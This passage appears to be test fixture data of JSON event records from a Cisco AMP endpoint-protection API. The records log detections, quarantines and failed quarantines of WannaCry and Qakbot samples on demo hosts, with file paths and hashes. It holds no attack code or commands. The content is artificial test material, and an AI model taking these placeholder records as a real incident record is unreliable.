Quarantined","event_type_id":553648143,"detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":791000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":783000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":727000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":721000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":646000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":504000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":426000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":399000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662859016176000,"timestamp":1610651432,"timestamp_nanoseconds":199000000,"date":"2021-01-14T19:10:32+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662854721208000,"timestamp":1610651431,"timestamp_nanoseconds":856000000,"date":"2021-01-14T19:10:31+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":233000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":396000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":927000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 